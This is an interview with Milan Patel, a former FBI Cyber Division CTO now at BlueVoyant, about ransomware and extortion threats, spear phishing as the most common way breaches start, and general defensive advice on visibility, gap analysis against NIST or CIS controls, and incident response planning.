Milan Patel has seen a thing or two. He can’t talk about some of it, which makes sense, given that he’s the former CTO of the FBI Cyber Division. While there, he organized and co-led the Joint Requirements Team, facilitated by the White House National Security Council. Prior to that, he was one of the FBI’s most senior cyber agents and worked on numerous global cyber investigations including Anonymous, Rove Digital, and Silk Road. (Click here to read part 1 of this two-part series, where he talks about what he learned from those cases, along with the simultaneously harrowing and hilarious tale of his first official FBI vehicle.)
As you have probably gathered, Milan, now the chief client officer at BlueVoyant, knows a lot about cybercrime and cybersecurity. He was kind enough to share some of his knowledge with us, so read on!
Q: So what are some of the biggest threats to businesses?
A: To put it simply, bad guys want to make money and they're going to target organizations to accomplish that, whether they're stealing financial instruments like credit cards and siphoning money out of bank accounts or encrypted data in a ransomware campaign to hold it hostage. They could also be stealing other proprietary data with either political or intelligence value and extorting money as part of the scheme—so they’re not just encrypting data and asking for ransom, they are stealing the data and holding it hostage and then asking for a ransom. What we're seeing is companies are willing to pay a lot of money to get their data back or at least make sure the data not exposed publicly.
Q: What’s the cause of most breaches?
A: I think the cause is probably two-fold. First, nearly 90% of breaches start with a spear phishing campaign of some kind. This entails getting company employees to click on things they shouldn't or download something they shouldn’t. Whether it’s a nation-state actor with sophisticated means and sophisticated needs or a common criminal looking for money, the initial vector is still the same. Social engineering/spear phishing is the predominant vector to get inside companies. Employee cybersecurity education helps, but unfortunately, the bad guys are getting really smart at crafting spear phishing campaigns well beyond the sort of Nigerian scam letters and “click here” written in broken English with Google Translate. For example, they study their future victims they intend to attack by going to LinkedIn, discovering who is the CFO's assistant then crafting an email to this person pretending to be the CFO asking for the latest financial reports. The assistant unknowingly has now sent these confidential documents to the criminal.
Second, bad guys are increasingly using legitimate information technology management tools to masquerade as legitimate processes that will usually go undetected because have been white listed. We call this “living off the land.”
Q: On that note, if your best friend owned a business and asked you for recommendations for security, what would your top recommendation be?
A: I would recommend my friend makes sure the basics are being handled the right way. It starts with knowing what is important to you company – for example, is it proprietary data or customer data and where is it? Then you need to understand how you can gain visibility into those sensitive places. This way if something tries to get in you get alerted immediately and also enabling you determine a quicker response. For example, If something reaches a critical server where your sensitive data resides, make sure that you have the ability to know what happened, in real time, and be able to take the right kind of action. If you're going to suffer an incident, it's better to suffer that incident rather than suffer a breach on top of that incident. Simply put, ensure you have visibility and the ability to understand your data which enables a faster response.
There are lots of other tools you can layer in to do additional security monitoring, but the basics must be covered—cover the vault and cover the front and back door. There seems to be a trend that you need to buy all these sophisticated tools, but these tools were never designed to work together, and organizations are having a tough time figuring out how to use these tools effectively so they work together to find threats on the network.
After this you need to add training for your employees and a set of expert eyes on your security solution console(s), reviewing data coming in and out of the endpoint and network to make sure that what you're looking at is a real threat, not benign or a false positive.
Q: What should a CISO-type consider when putting together a security plan? Are certain things often overlooked?
A: Having a plan is always important and it lends itself to an adage, which is if you don't write it down, it didn't happen. What we see is that due to resource constraints, a lot of mid-market customers have a tough time documenting a roadmap to achieve the level of security posture that they budgeted for.
What I tell our customers is you need a really objective plan that accounts for viewing your enterprise as a whole, not just listening to a particular team or employee that has a particular viewpoint. Individual employees are part of the business unit and a particular data set may be extremely important to them. They don't want to see anybody mess with it for fear of slowing down their business. That all has to be taken into account after an objective understanding of your overall environment is completed.
We always recommend having an outside third party come in and evaluate your current status and where you need to be. The way we typically talk about that is at a minimum, let's see where the gap is between total NIST or CIS TOP 20 alignment and where you are today. Let’s see the gap analysis from these framework(s) and best practices that helps you put down markers in terms of the right controls for your enterprise. They ultimately tie back to strategy and budgeting.
The second thing I would recommend is a really good response plan—one that is not just written to check a box but carefully documented to ensure it reflects the real-world and is achievable. We read a lot of response plans and many just say, we're going to do XYZ. What you really need to do is peel back the onion to say “If we have a day-to-day commodity malware attack, these are the things we're going to do. These are the levels of authority we want in place. If we have a ransomware attack, this is what we're going to do. If somebody held data hostage outside the network and wants $1 million to get it back, we're going to do this.” I think those things are truly relevant. Particularly if you're working with a managed security service that has the ability to help you protect your network, then your response plan may change. If you have those two documents and those two policies written, you put yourself in a really defensible position.